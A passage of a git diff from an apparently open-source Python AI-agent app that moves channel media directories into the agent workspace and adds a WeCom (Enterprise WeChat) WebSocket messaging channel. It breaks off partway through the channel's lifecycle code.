             bot_prefix=os.getenv("FEISHU_BOT_PREFIX", "[BOT] "),
             encrypt_key=os.getenv("FEISHU_ENCRYPT_KEY", ""),
             verification_token=os.getenv("FEISHU_VERIFICATION_TOKEN", ""),
-            media_dir=os.getenv("FEISHU_MEDIA_DIR", "~/.copaw/media"),
+            media_dir=os.getenv("FEISHU_MEDIA_DIR", ""),
             on_reply_sent=on_reply_sent,
             dm_policy=os.getenv("FEISHU_DM_POLICY", "open"),
             group_policy=os.getenv("FEISHU_GROUP_POLICY", "open"),
@@ -253,6 +265,7 @@ def from_config(
         show_tool_details: bool = True,
         filter_tool_messages: bool = False,
         filter_thinking: bool = False,
+        workspace_dir: Path | None = None,
     ) -> "FeishuChannel":
         return cls(
             process=process,
@@ -262,7 +275,8 @@ def from_config(
             bot_prefix=config.bot_prefix or "[BOT] ",
             encrypt_key=config.encrypt_key or "",
             verification_token=config.verification_token or "",
-            media_dir=config.media_dir or "~/.copaw/media",
+            media_dir=config.media_dir or "",
+            workspace_dir=workspace_dir,
             on_reply_sent=on_reply_sent,
             show_tool_details=show_tool_details,
             filter_tool_messages=filter_tool_messages,
@@ -998,7 +1012,12 @@ async def _download_file_resource(
     def _receive_id_store_path(self) -> Path:
         """
         Path to persist receive_id mapping (for cron to resolve after restart).
+
+        Uses agent workspace directory if available, otherwise falls back
+        to global config directory for backward compatibility.
         """
+        if self._workspace_dir:
+            return self._workspace_dir / "feishu_receive_ids.json"
         return get_config_path().parent / "feishu_receive_ids.json"

     def _load_receive_id_store_from_disk(self) -> None:
diff --git a/src/copaw/app/channels/imessage/channel.py b/src/copaw/app/channels/imessage/channel.py
index bf4d4f0fd..e4f312208 100644
--- a/src/copaw/app/channels/imessage/channel.py
+++ b/src/copaw/app/channels/imessage/channel.py
@@ -21,6 +21,7 @@
 )

 from ....config.config import IMessageChannelConfig
+from ....constant import DEFAULT_MEDIA_DIR
 from ..utils import file_url_to_local_path
 from ....agents.utils.file_handling import download_file_from_url
@@ -44,7 +45,7 @@ def __init__(
         db_path: str,
         poll_sec: float,
         bot_prefix: str,
-        media_dir: str = "~/.copaw/media",
+        media_dir: str = "",
         max_decoded_size: int = 10 * 1024 * 1024,  # 10MB default
         on_reply_sent: OnReplySent = None,
         show_tool_details: bool = True,
@@ -64,7 +65,9 @@ def __init__(
         self.bot_prefix = bot_prefix

         # Create media directory for downloaded files
-        self._media_dir = Path(media_dir).expanduser()
+        self._media_dir = (
+            Path(media_dir).expanduser() if media_dir else DEFAULT_MEDIA_DIR
+        )
         self._media_dir.mkdir(parents=True, exist_ok=True)

         # Base64 data size limit
@@ -89,7 +92,7 @@ def from_env(
             ),
             poll_sec=float(os.getenv("IMESSAGE_POLL_SEC", "1.0")),
             bot_prefix=os.getenv("IMESSAGE_BOT_PREFIX", "[BOT] "),
-            media_dir=os.getenv("IMESSAGE_MEDIA_DIR", "~/.copaw/media"),
+            media_dir=os.getenv("IMESSAGE_MEDIA_DIR", ""),
             max_decoded_size=int(
                 os.getenv("IMESSAGE_MAX_DECODED_SIZE", "10485760"),
             ),  # 10MB
@@ -112,7 +115,7 @@ def from_config(
             db_path=config.db_path or "~/Library/Messages/chat.db",
             poll_sec=config.poll_sec,
             bot_prefix=config.bot_prefix or "[BOT] ",
-            media_dir=config.media_dir or "~/.copaw/media",
+            media_dir=config.media_dir if config.media_dir else "",
             max_decoded_size=config.max_decoded_size,
             on_reply_sent=on_reply_sent,
             show_tool_details=show_tool_details,
diff --git a/src/copaw/app/channels/manager.py b/src/copaw/app/channels/manager.py
index 41184b08b..02d4b6306 100644
--- a/src/copaw/app/channels/manager.py
+++ b/src/copaw/app/channels/manager.py
@@ -7,6 +7,7 @@

 import asyncio
 import logging
+from pathlib import Path

 from typing import (
     Callable,
@@ -159,8 +160,16 @@ def from_config(
         process: ProcessHandler,
         config: "Config",
         on_last_dispatch: OnLastDispatch = None,
+        workspace_dir: Path | None = None,
     ) -> "ChannelManager":
-        """Create channels from config (config.json)."""
+        """Create channels from config (config.json or agent.json).
+
+        Args:
+            process: Process handler for agent communication
+            config: Configuration object with channels
+            on_last_dispatch: Callback for dispatch events
+            workspace_dir: Agent workspace directory for channel state files
+        """
         available = get_available_channels()
         ch = config.channels
         show_tool_details = getattr(config, "show_tool_details", True)
@@ -180,6 +189,12 @@ def from_config(
             )
             if ch_cfg is None:
                 continue
+
+            # Check if channel is enabled
+            enabled = getattr(ch_cfg, "enabled", False)
+            if not enabled:
+                continue
+
             filter_tool_messages = getattr(
                 ch_cfg,
                 "filter_tool_messages",
@@ -190,16 +205,26 @@ def from_config(
                 "filter_thinking",
                 False,
             )
-            channels.append(
-                ch_cls.from_config(
-                    process,
-                    ch_cfg,
-                    on_reply_sent=on_last_dispatch,
-                    show_tool_details=show_tool_details,
-                    filter_tool_messages=filter_tool_messages,
-                    filter_thinking=filter_thinking,
-                ),
-            )
+
+            # Pass workspace_dir to channel if supported
+            from_config_kwargs = {
+                "process": process,
+                "config": ch_cfg,
+                "on_reply_sent": on_last_dispatch,
+                "show_tool_details": show_tool_details,
+                "filter_tool_messages": filter_tool_messages,
+                "filter_thinking": filter_thinking,
+            }
+
+            # Only pass workspace_dir to channels that support it
+            import inspect
+
+            sig = inspect.signature(ch_cls.from_config)
+            if "workspace_dir" in sig.parameters:
+                from_config_kwargs["workspace_dir"] = workspace_dir
+
+            channels.append(ch_cls.from_config(**from_config_kwargs))
+
         return cls(channels)

     def _make_enqueue_cb(self, channel_id: str) -> Callable[[Any], None]:
diff --git a/src/copaw/app/channels/mattermost/channel.py b/src/copaw/app/channels/mattermost/channel.py
index 3d9f4954b..a77ef88ed 100644
--- a/src/copaw/app/channels/mattermost/channel.py
+++ b/src/copaw/app/channels/mattermost/channel.py
@@ -20,6 +20,7 @@
 )

 from ....config.config import MattermostConfig as MattermostChannelConfig
+from ....constant import WORKING_DIR
 from ..base import (
     BaseChannel,
     OnReplySent,
@@ -31,7 +32,7 @@

 MATTERMOST_POST_CHUNK_SIZE = 4000  # chars per post (hard limit ~16383)

-_DEFAULT_MEDIA_DIR = Path("~/.copaw/media/mattermost").expanduser()
+_DEFAULT_MEDIA_DIR = WORKING_DIR / "media" / "mattermost"
 _TYPING_TIMEOUT_S = 180

 _IMAGE_SUFFIXES = {".jpg", ".jpeg", ".png", ".gif", ".webp", ".bmp", ".tiff"}
diff --git a/src/copaw/app/channels/qq/channel.py b/src/copaw/app/channels/qq/channel.py
index 3314139bd..9f2c426d7 100644
--- a/src/copaw/app/channels/qq/channel.py
+++ b/src/copaw/app/channels/qq/channel.py
@@ -35,6 +35,7 @@
 )

 from ....config.config import QQConfig as QQChannelConfig
+from ....constant import WORKING_DIR

 from ..base import (
     BaseChannel,
@@ -73,7 +74,7 @@
 _IMAGE_TAG_PATTERN = re.compile(r"\[Image: (https?://[^\]]+)\]", re.IGNORECASE)

 # Rich media paths
-_DEFAULT_MEDIA_DIR = Path("~/.copaw/media/qq").expanduser()
+_DEFAULT_MEDIA_DIR = WORKING_DIR / "media" / "qq"


 class QQApiError(RuntimeError):
diff --git a/src/copaw/app/channels/registry.py b/src/copaw/app/channels/registry.py
index 8cbd9d1b6..cddae6ce9 100644
--- a/src/copaw/app/channels/registry.py
+++ b/src/copaw/app/channels/registry.py
@@ -28,6 +28,8 @@
     "console": (".console", "ConsoleChannel"),
     "matrix": (".matrix", "MatrixChannel"),
     "voice": (".voice", "VoiceChannel"),
+    "wecom": (".wecom", "WecomChannel"),
+    "xiaoyi": (".xiaoyi", "XiaoYiChannel"),
 }

 # Required channels must load; failures are raised, not skipped.
diff --git a/src/copaw/app/channels/renderer.py b/src/copaw/app/channels/renderer.py
index 035e7382b..0aa65e00f 100644
--- a/src/copaw/app/channels/renderer.py
+++ b/src/copaw/app/channels/renderer.py
@@ -44,6 +44,7 @@ class RenderStyle:
     use_emoji: bool = True
     filter_tool_messages: bool = False
     filter_thinking: bool = False
+    internal_tools: frozenset = frozenset()


 def _fmt_tool_call(
@@ -192,11 +193,17 @@ def _parts_for_tool_output(content_list: list) -> List[_OutgoingPart]:
                 ContentType.VIDEO,
                 ContentType.FILE,
             )
-            media_parts = [
-                p
-                for p in block_parts
-                if getattr(p, "type", None) in media_types
-            ]
+            # Internal tools (e.g. view_image) produce
+            # media for the LLM, not the user — skip.
+            media_parts = (
+                []
+                if name in s.internal_tools
+                else [
+                    p
+                    for p in block_parts
+                    if getattr(p, "type", None) in media_types
+                ]
+            )
             out.extend(media_parts)
             if not media_parts:
                 out.append(
@@ -265,6 +272,9 @@ def _parts_for_tool_output(content_list: list) -> List[_OutgoingPart]:
             if getattr(c, "type", None) != ContentType.DATA:
                 continue
             data = getattr(c, "data", None) or {}
+            name = data.get("name") or "tool"
+            if name in s.internal_tools:
+                continue
             output = data.get("output", "")
             try:
                 output = json.loads(output)
diff --git a/src/copaw/app/channels/schema.py b/src/copaw/app/channels/schema.py
index 11dd48157..f7dedd59e 100644
--- a/src/copaw/app/channels/schema.py
+++ b/src/copaw/app/channels/schema.py
@@ -38,6 +38,7 @@ def to_handle(self) -> str:
     "mqtt",
     "console",
     "voice",
+    "xiaoyi",
 )

 # ChannelType is str to allow plugin channels; built-in set above.
diff --git a/src/copaw/app/channels/telegram/channel.py b/src/copaw/app/channels/telegram/channel.py
index de79b91f4..042f665b2 100644
--- a/src/copaw/app/channels/telegram/channel.py
+++ b/src/copaw/app/channels/telegram/channel.py
@@ -51,7 +51,7 @@
     50 * 1024 * 1024
 )  # 50 MB – Telegram bot upload limit

-_DEFAULT_MEDIA_DIR = Path("~/.copaw/media/telegram").expanduser()
+_DEFAULT_MEDIA_DIR = WORKING_DIR / "media" / "telegram"
 _TYPING_TIMEOUT_S = 180

 _RECONNECT_INITIAL_S = 2.0
@@ -278,6 +279,7 @@ def __init__(
         on_reply_sent: OnReplySent = None,
         show_tool_details: bool = True,
         media_dir: str = "",
+        workspace_dir: Path | None = None,
         show_typing: bool = True,
         filter_tool_messages: bool = False,
         filter_thinking: bool = False,
@@ -307,6 +308,9 @@ def __init__(
         self._media_dir = (
             Path(media_dir).expanduser() if media_dir else _DEFAULT_MEDIA_DIR
         )
+        self._workspace_dir = (
+            Path(workspace_dir).expanduser() if workspace_dir else None
+        )
         self._show_typing = show_typing
         self._typing_tasks: dict[str, asyncio.Task] = {}
         self._task: Optional[asyncio.Task] = None
@@ -485,6 +489,7 @@ def from_config(
         show_tool_details: bool = True,
         filter_tool_messages: bool = False,
         filter_thinking: bool = False,
+        workspace_dir: Path | None = None,
     ) -> "TelegramChannel":
         if isinstance(config, dict):
             c = config
@@ -509,6 +514,7 @@ def _get_str(key: str) -> str:
             show_tool_details=show_tool_details,
             filter_tool_messages=filter_tool_messages,
             filter_thinking=filter_thinking,
+            workspace_dir=workspace_dir,
             show_typing=show_typing,
             dm_policy=c.get("dm_policy") or "open",
             group_policy=c.get("group_policy") or "open",
@@ -784,7 +790,11 @@ async def _send_media_value(
                 "Could not resolve media file from URL.",
             )
         local_path = Path(raw_path).resolve()
-        allowed_root = (WORKING_DIR / "media").resolve()
+        allowed_root = (
+            (self._workspace_dir / "media").resolve()
+            if self._workspace_dir
+            else (WORKING_DIR / "media").resolve()
+        )
         if not local_path.is_relative_to(allowed_root):
             logger.error(
                 "telegram: blocked media outside allowed directory: %s",
diff --git a/src/copaw/app/channels/wecom/__init__.py b/src/copaw/app/channels/wecom/__init__.py
new file mode 100644
index 000000000..32a770d63
--- /dev/null
+++ b/src/copaw/app/channels/wecom/__init__.py
@@ -0,0 +1,6 @@
+# -*- coding: utf-8 -*-
+"""WeCom (Enterprise WeChat) channel package."""
+
+from .channel import WecomChannel
+
+__all__ = ["WecomChannel"]
diff --git a/src/copaw/app/channels/wecom/channel.py b/src/copaw/app/channels/wecom/channel.py
new file mode 100644
index 000000000..87923f14a
--- /dev/null
+++ b/src/copaw/app/channels/wecom/channel.py
@@ -0,0 +1,812 @@
+# -*- coding: utf-8 -*-
+# pylint: disable=too-many-statements,too-many-branches
+# pylint: disable=too-many-return-statements,too-many-instance-attributes
+# pylint: disable=too-many-nested-blocks
+"""WeCom (Enterprise WeChat) Channel.
+
+Uses the aibot WebSocket SDK to receive messages from WeCom AI Bot.
+Sends replies via the same WebSocket channel using stream mode
+(reply_stream). Supports text, image, voice, file, and mixed messages.
+"""
+
+from __future__ import annotations
+
+import asyncio
+import hashlib
+import logging
+import os
+import sys
+import threading
+from collections import OrderedDict
+from pathlib import Path
+from typing import Any, Dict, List, Optional
+
+from agentscope_runtime.engine.schemas.agent_schemas import (
+    AgentRequest,
+    FileContent,
+    ImageContent,
+    TextContent,
+)
+from aibot import WSClient, WSClientOptions, generate_req_id
+
+from ....constant import DEFAULT_MEDIA_DIR
+from ..base import (
+    BaseChannel,
+    ContentType,
+    OnReplySent,
+    OutgoingContentPart,
+    ProcessHandler,
+)
+from .utils import format_markdown_tables
+
+logger = logging.getLogger(__name__)
+
+# Max number of processed message_ids to keep for dedup.
+_WECOM_PROCESSED_IDS_MAX = 2000
+
+
+class WecomChannel(BaseChannel):
+    """WeCom AI Bot channel: WebSocket receive and send.
+
+ Session: for single-chat session_id = wecom:<userid>, for group-chat
+ wecom:group:<chatid>. The frame from the SDK is stored in meta so
+ we can call reply_stream back through the same connection.
+ """
+
+ channel = "wecom"
+
+ def __init__(
+ self,
+ process: ProcessHandler,
+ enabled: bool,
+ bot_id: str,
+ secret: str,
+ bot_prefix: str = "[BOT] ",
+ media_dir: str = "",
+ welcome_text: str = "",
+ on_reply_sent: OnReplySent = None,
+ show_tool_details: bool = True,
+ filter_tool_messages: bool = False,
+ filter_thinking: bool = False,
+ dm_policy: str = "open",
+ group_policy: str = "open",
+ allow_from: Optional[List[str]] = None,
+ deny_message: str = "",
+ max_reconnect_attempts: int = -1,
+ ):
+ super().__init__(
+ process,
+ on_reply_sent=on_reply_sent,
+ show_tool_details=show_tool_details,
+ filter_tool_messages=filter_tool_messages,
+ filter_thinking=filter_thinking,
+ dm_policy=dm_policy,
+ group_policy=group_policy,
+ allow_from=allow_from,
+ deny_message=deny_message,
+ )
+ self.enabled = enabled
+ self.bot_id = bot_id
+ self.secret = secret
+ self.bot_prefix = bot_prefix
+ self.welcome_text = welcome_text
+ self._media_dir = (
+ Path(media_dir).expanduser() if media_dir else DEFAULT_MEDIA_DIR
+ )
+ self._max_reconnect_attempts = max_reconnect_attempts
+
+ self._client: Any = None
+ self._loop: Optional[asyncio.AbstractEventLoop] = None
+ self._ws_thread: Optional[threading.Thread] = None
+
+ # message_id dedup (ordered dict, trimmed when over limit)
+ self._processed_message_ids: OrderedDict[str, None] = OrderedDict()
+ self._processed_ids_lock = threading.Lock()
+
+ @classmethod
+ def from_env(
+ cls,
+ process: ProcessHandler,
+ on_reply_sent: OnReplySent = None,
+ ) -> "WecomChannel":
+ allow_from_env = os.getenv("WECOM_ALLOW_FROM", "")
+ allow_from = (
+ [s.strip() for s in allow_from_env.split(",") if s.strip()]
+ if allow_from_env
+ else []
+ )
+ return cls(
+ process=process,
+ enabled=os.getenv("WECOM_CHANNEL_ENABLED", "0") == "1",
+
bot_id=os.getenv("WECOM_BOT_ID", ""), + secret=os.getenv("WECOM_SECRET", ""), + bot_prefix=os.getenv("WECOM_BOT_PREFIX", "[BOT] "), + media_dir=os.getenv("WECOM_MEDIA_DIR", ""), + on_reply_sent=on_reply_sent, + dm_policy=os.getenv("WECOM_DM_POLICY", "open"), + group_policy=os.getenv("WECOM_GROUP_POLICY", "open"), + allow_from=allow_from, + deny_message=os.getenv("WECOM_DENY_MESSAGE", ""), + max_reconnect_attempts=int( + os.getenv("WECOM_MAX_RECONNECT_ATTEMPTS", "-1"), + ), + ) + + @classmethod + def from_config( + cls, + process: ProcessHandler, + config: Any, + on_reply_sent: OnReplySent = None, + show_tool_details: bool = True, + filter_tool_messages: bool = False, + filter_thinking: bool = False, + ) -> "WecomChannel": + return cls( + process=process, + enabled=getattr(config, "enabled", False), + bot_id=getattr(config, "bot_id", "") or "", + secret=getattr(config, "secret", "") or "", + bot_prefix=getattr(config, "bot_prefix", "[BOT] ") or "[BOT] ", + media_dir=getattr(config, "media_dir", None) or "", + welcome_text=getattr(config, "welcome_text", "") or "", + on_reply_sent=on_reply_sent, + show_tool_details=show_tool_details, + filter_tool_messages=filter_tool_messages, + filter_thinking=filter_thinking, + dm_policy=getattr(config, "dm_policy", "open") or "open", + group_policy=getattr(config, "group_policy", "open") or "open", + allow_from=getattr(config, "allow_from", []) or [], + deny_message=getattr(config, "deny_message", "") or "", + max_reconnect_attempts=int( + -1 + if getattr(config, "max_reconnect_attempts", None) is None + else getattr(config, "max_reconnect_attempts"), + ), + ) + + # ------------------------------------------------------------------ + # Session / handle helpers + # ------------------------------------------------------------------ + + def resolve_session_id( + self, + sender_id: str, + channel_meta: Optional[Dict[str, Any]] = None, + ) -> str: + """Build session_id from meta or sender_id.""" + meta = channel_meta or {} + chatid = 
(meta.get("wecom_chatid") or "").strip() + chat_type = (meta.get("wecom_chat_type") or "single").strip() + if chat_type == "group" and chatid: + return f"wecom:group:{chatid}" + if sender_id: + return f"wecom:{sender_id}" + return f"wecom:{chatid or 'unknown'}" + + @staticmethod + def _parse_chatid_from_handle(to_handle: str) -> str: + """Extract chatid/userid from a to_handle string. + + - ``wecom:group:`` → ```` + - ``wecom:`` → ```` + """ + h = (to_handle or "").strip() + if h.startswith("wecom:group:"): + return h[len("wecom:group:") :] + if h.startswith("wecom:"): + return h[len("wecom:") :] + return h + + def to_handle_from_target(self, *, user_id: str, session_id: str) -> str: + """Return send handle; session_id takes priority.""" + return session_id or f"wecom:{user_id}" + + def get_to_handle_from_request(self, request: Any) -> str: + session_id = getattr(request, "session_id", "") or "" + user_id = getattr(request, "user_id", "") or "" + return session_id or f"wecom:{user_id}" + + def get_on_reply_sent_args( + self, + request: Any, + to_handle: str, + ) -> tuple: + return ( + getattr(request, "user_id", "") or "", + getattr(request, "session_id", "") or "", + ) + + def build_agent_request_from_native( + self, + native_payload: Any, + ) -> "AgentRequest": + """Build AgentRequest from a wecom native dict.""" + payload = native_payload if isinstance(native_payload, dict) else {} + channel_id = payload.get("channel_id") or self.channel + sender_id = payload.get("sender_id") or "" + content_parts = payload.get("content_parts") or [] + meta = payload.get("meta") or {} + session_id = payload.get("session_id") or self.resolve_session_id( + sender_id, + meta, + ) + user_id = payload["user_id"] if "user_id" in payload else sender_id + request = self.build_agent_request_from_user_content( + channel_id=channel_id, + sender_id=user_id, + session_id=session_id, + content_parts=content_parts, + channel_meta=meta, + ) + setattr(request, "channel_meta", meta) + return 
request + + def merge_native_items(self, items: List[Any]) -> Any: + """Merge same-session native payloads: concat content_parts.""" + if not items: + return None + first = items[0] if isinstance(items[0], dict) else {} + merged_parts: List[Any] = [] + for it in items: + p = it if isinstance(it, dict) else {} + merged_parts.extend(p.get("content_parts") or []) + last = items[-1] if isinstance(items[-1], dict) else {} + return { + "channel_id": first.get("channel_id") or self.channel, + "sender_id": last.get( + "sender_id", + first.get("sender_id", ""), + ), + "user_id": last.get("user_id", first.get("user_id", "")), + "session_id": last.get( + "session_id", + first.get("session_id", ""), + ), + "content_parts": merged_parts, + "meta": dict(last.get("meta") or {}), + } + + # ------------------------------------------------------------------ + # Message dedup helper + # ------------------------------------------------------------------ + + def _is_duplicate(self, msg_id: str) -> bool: + """Return True if msg_id was already seen; record it.""" + with self._processed_ids_lock: + if msg_id in self._processed_message_ids: + return True + self._processed_message_ids[msg_id] = None + while len(self._processed_message_ids) > _WECOM_PROCESSED_IDS_MAX: + self._processed_message_ids.popitem(last=False) + return False + + # ------------------------------------------------------------------ + # Incoming message handlers (called from WS thread, dispatch to loop) + # ------------------------------------------------------------------ + + def _on_message_sync(self, frame: Any) -> None: + """Sync handler called from SDK event; dispatches to async loop.""" + if not self._loop or not self._loop.is_running(): + logger.warning("wecom: main loop not set/running, drop message") + return + asyncio.run_coroutine_threadsafe( + self._on_message(frame), + self._loop, + ) + + async def _on_message(self, frame: Any) -> None: + """Parse and enqueue one incoming message.""" + try: + body = 
frame.get("body") or {} + msgtype = body.get("msgtype") or "" + sender_id = (body.get("from") or {}).get("userid", "") + chatid = body.get("chatid", "") + chat_type = body.get("chattype", "single") + + # Build unique message id for dedup + msg_id = ( + body.get("msgid") or "" + ) or f"{sender_id}_{body.get('send_time', '')}" + if msg_id and self._is_duplicate(msg_id): + return + + content_parts: List[Any] = [] + text_parts: List[str] = [] + + if msgtype == "text": + text = (body.get("text") or {}).get("content", "").strip() + if text: + text_parts.append(text) + + elif msgtype == "image": + img_info = body.get("image") or {} + url = img_info.get("url") or "" + aes_key = img_info.get("aeskey") or "" + if url: + path = await self._download_media( + url, + aes_key=aes_key, + filename_hint="image.jpg", + ) + if path: + content_parts.append( + ImageContent( + type=ContentType.IMAGE, + image_url=path, + ), + ) + else: + text_parts.append("[image: download failed]") + else: + text_parts.append("[image: no url]") + + elif msgtype == "voice": + voice_info = body.get("voice") or {} + # Use ASR text from WeCom; no need to download audio + asr_text = voice_info.get("content", "").strip() + if asr_text: + text_parts.append(asr_text) + else: + text_parts.append("[voice: no text]") + + elif msgtype == "file": + file_info = body.get("file") or {} + url = file_info.get("url") or "" + aes_key = file_info.get("aeskey") or "" + filename = file_info.get("filename") or "file.bin" + if url: + path = await self._download_media( + url, + aes_key=aes_key, + filename_hint=filename, + ) + if path: + content_parts.append( + FileContent( + type=ContentType.FILE, + file_url=path, + ), + ) + else: + text_parts.append("[file: download failed]") + else: + text_parts.append("[file: no url]") + + elif msgtype == "mixed": + # Mixed: list of items, each has msgtype, text or image + mixed_items = body.get("mixed", {}).get("msg_item", []) + for item in mixed_items: + itype = item.get("msgtype") or "" + 
if itype == "text": + t = item.get("text", {}).get("content", "").strip() + if t: + text_parts.append(t) + elif itype == "image": + img = item.get("image") or {} + url = img.get("url") or "" + aes_key = img.get("aeskey") or "" + if url: + path = await self._download_media( + url, + aes_key=aes_key, + filename_hint="image.jpg", + ) + if path: + content_parts.append( + ImageContent( + type=ContentType.IMAGE, + image_url=path, + ), + ) + else: + text_parts.append("[image: download failed]") + else: + text_parts.append(f"[{msgtype}]") + + text = "\n".join(text_parts).strip() + if text: + content_parts.insert( + 0, + TextContent(type=ContentType.TEXT, text=text), + ) + if not content_parts: + return + + is_group = chat_type == "group" + meta: Dict[str, Any] = { + "wecom_sender_id": sender_id, + "wecom_chatid": chatid, + "wecom_chat_type": chat_type, + "wecom_frame": frame, + "is_group": is_group, + } + + allowed, error_msg = self._check_allowlist(sender_id, is_group) + if not allowed: + logger.info( + "wecom allowlist blocked: sender=%s is_group=%s", + sender_id, + is_group, + ) + await self._send_text_via_frame( + frame, + error_msg or "Access denied.", + ) + return + + # Send "processing" indicator only if message has text content + processing_stream_id = "" + if text_parts and self._client: + processing_stream_id = generate_req_id("stream") + try: + await self._client.reply_stream( + frame, + stream_id=processing_stream_id, + content="🤔 思考中...", + finish=False, + ) + except Exception: + logger.debug("wecom failed to send processing indicator") + + session_id = self.resolve_session_id(sender_id, meta) + if processing_stream_id: + meta["wecom_processing_stream_id"] = processing_stream_id + native = { + "channel_id": self.channel, + "sender_id": sender_id, + # Group chats share one session; omit user_id so the + # session file is keyed by session_id only. 
+ "user_id": "" if is_group else sender_id, + "session_id": session_id, + "content_parts": content_parts, + "meta": meta, + } + logger.info( + "wecom recv: sender=%s chatid=%s msgtype=%s text_len=%s", + sender_id[:20], + (chatid or "")[:20], + msgtype, + len(text), + ) + if self._enqueue is not None: + self._enqueue(native) + except Exception: + logger.exception("wecom _on_message failed") + + def _on_enter_chat_sync(self, frame: Any) -> None: + """Sync handler called from SDK event; dispatches to async loop.""" + if not self._loop or not self._loop.is_running(): + logger.warning("wecom: main loop not set/running, drop enter_chat") + return + asyncio.run_coroutine_threadsafe( + self._on_enter_chat(frame), + self._loop, + ) + + async def _on_enter_chat(self, frame: Any) -> None: + """Handle enter_chat event; send welcome reply if configured.""" + logger.info("wecom enter_chat event") + if not self.welcome_text or not self._client: + return + await self._client.reply_welcome( + frame, + {"msgtype": "text", "text": {"content": self.welcome_text}}, + ) + + # ------------------------------------------------------------------ + # File download helper + # ------------------------------------------------------------------ + + async def _download_media( + self, + url: str, + aes_key: str = "", + filename_hint: str = "file.bin", + ) -> Optional[str]: + """Download (and optionally decrypt) media; return local path.""" + if not self._client: + return None + try: + data, filename = await self._client.download_file( + url, + aes_key or None, + ) + fn = filename or filename_hint + # Determine extension from hint if file has none + hint_ext = Path(filename_hint).suffix + if hint_ext and Path(fn).suffix in ("", ".bin", ".file"): + fn = (Path(fn).stem or "file") + hint_ext + self._media_dir.mkdir(parents=True, exist_ok=True) + safe_name = ( + "".join(c for c in fn if c.isalnum() or c in "-_.") or "media" + ) + url_hash = hashlib.md5(url.encode()).hexdigest()[:8] + path = 
self._media_dir / f"wecom_{url_hash}_{safe_name}" + path.write_bytes(data) + return str(path) + except Exception: + logger.exception("wecom _download_media failed url=%s", url[:60]) + return None + + # ------------------------------------------------------------------ + # Send helpers + # ------------------------------------------------------------------ + + async def _send_text_via_frame( + self, + frame: Any, + text: str, + stream_id: str = "", + ) -> None: + """Send a text reply using the SDK reply method (stream finish). + + Args: + frame: WebSocket frame from the incoming message. + text: Content to send. + stream_id: Optional stream ID to overwrite existing message. + If empty, a new UUID is generated. + """ + if not self._client or not text: + return + try: + sid = stream_id or generate_req_id("stream") + await self._client.reply_stream( + frame, + stream_id=sid, + content=text, + finish=True, + ) + except Exception: + logger.exception("wecom _send_text_via_frame failed") + + async def _send_image_via_send_message( + self, + chatid: str, + part: OutgoingContentPart, + ) -> None: + """Send image as markdown inline (best-effort via send_message).""" + if not self._client or not chatid: + return + image_url = getattr(part, "image_url", "") or "" + if not image_url: + return + # WeCom does not support uploading images via WS; use markdown link + try: + await self._client.send_message( + chatid, + { + "msgtype": "markdown", + "markdown": {"content": f"![image]({image_url})"}, + }, + ) + except Exception: + logger.exception("wecom _send_image_via_send_message failed") + + async def send_content_parts( + self, + to_handle: str, + parts: List[OutgoingContentPart], + meta: Optional[Dict[str, Any]] = None, + ) -> None: + """Send text (stream) and media parts back to WeCom.""" + if not self.enabled: + return + m = meta or {} + frame = m.get("wecom_frame") + chatid = ( + m.get("wecom_chatid") + or self._parse_chatid_from_handle(to_handle) + or "" + ) + + prefix = 
m.get("bot_prefix", "") or self.bot_prefix or "" + text_parts: List[str] = [] + media_parts: List[OutgoingContentPart] = [] + + for p in parts: + t = getattr(p, "type", None) or ( + p.get("type") if isinstance(p, dict) else None + ) + text_val = getattr(p, "text", None) or ( + p.get("text") if isinstance(p, dict) else None + ) + refusal_val = getattr(p, "refusal", None) or ( + p.get("refusal") if isinstance(p, dict) else None + ) + if t == ContentType.TEXT and text_val: + text_parts.append(text_val) + elif t == ContentType.REFUSAL and refusal_val: + text_parts.append(refusal_val) + elif t in ( + ContentType.IMAGE, + ContentType.FILE, + ContentType.VIDEO, + ContentType.AUDIO, + ): + media_parts.append(p) + + body = "\n".join(text_parts).strip() + if prefix and body: + body = prefix + body + + # Format markdown tables for WeCom compatibility + body = format_markdown_tables(body) + + # Use processing stream_id to overwrite "thinking..." indicator + # Only first reply uses it; subsequent replies get new stream_id + processing_sid = m.pop("wecom_processing_stream_id", "") + + if body and frame: + await self._send_text_via_frame(frame, body, processing_sid) + elif body and chatid: + # Proactive send without an inbound frame + try: + await self._client.send_message( + chatid, + { + "msgtype": "markdown", + "markdown": {"content": body}, + }, + ) + except Exception: + logger.exception("wecom send_content_parts proactive failed") + + # # the SDK does not support sending media files. 
+ # for part in media_parts:
+ # pt = getattr(part, "type", None)
+ # if pt == ContentType.IMAGE and chatid:
+ # await self._send_image_via_send_message(chatid, part)
+ # elif pt in (
+ # ContentType.FILE, ContentType.AUDIO, ContentType.VIDEO
+ # ):
+ # # Send file path/url as markdown link (WS channel limitation)
+ # file_url = (
+ # getattr(part, "file_url", "")
+ # or getattr(part, "video_url", "")
+ # or ""
+ # )
+ # if file_url and chatid:
+ # filename = Path(file_url).name or "file"
+ # try:
+ # await self._client.send_message(
+ # chatid,
+ # {
+ # "msgtype": "markdown",
+ # "markdown": {
+ # "content": f"[{filename}]({file_url})"
+ # },
+ # },
+ # )
+ # except Exception:
+ # logger.exception(
+ # "wecom send_content_parts file link failed"
+ # )
+
+ async def send(
+ self,
+ to_handle: str,
+ text: str,
+ meta: Optional[Dict[str, Any]] = None,
+ ) -> None:
+ """Proactive send: use send_message with markdown body."""
+ if not self.enabled:
+ return
+ m = meta or {}
+ chatid = (
+ m.get("wecom_chatid")
+ or self._parse_chatid_from_handle(to_handle)
+ or ""
+ )
+ frame = m.get("wecom_frame")
+ prefix = m.get("bot_prefix", "") or self.bot_prefix or ""
+ body = (prefix + text) if text else prefix
+
+ if not body:
+ return
+
+ if frame:
+ await self._send_text_via_frame(frame, body)
+ elif chatid and self._client:
+ try:
+ await self._client.send_message(
+ chatid,
+ {
+ "msgtype": "markdown",
+ "markdown": {"content": body},
+ },
+ )
+ except Exception:
+ logger.exception(
+ "wecom send proactive failed chatid=%s",
+ chatid,
+ )
+ else:
+ logger.warning(
+ "wecom send: no frame/chatid for to_handle=%s",
+ (to_handle or "")[:40],
+ )
+
+ # ------------------------------------------------------------------
+ # Lifecycle
+ # ------------------------------------------------------------------
+
+ def _run_ws_forever(self) -> None:
+ """Background thread: run SDK event loop forever."""
+ # macOS/Python 3.12+ fix: use SelectorEventLoop explicitly
+ if sys.platform ==
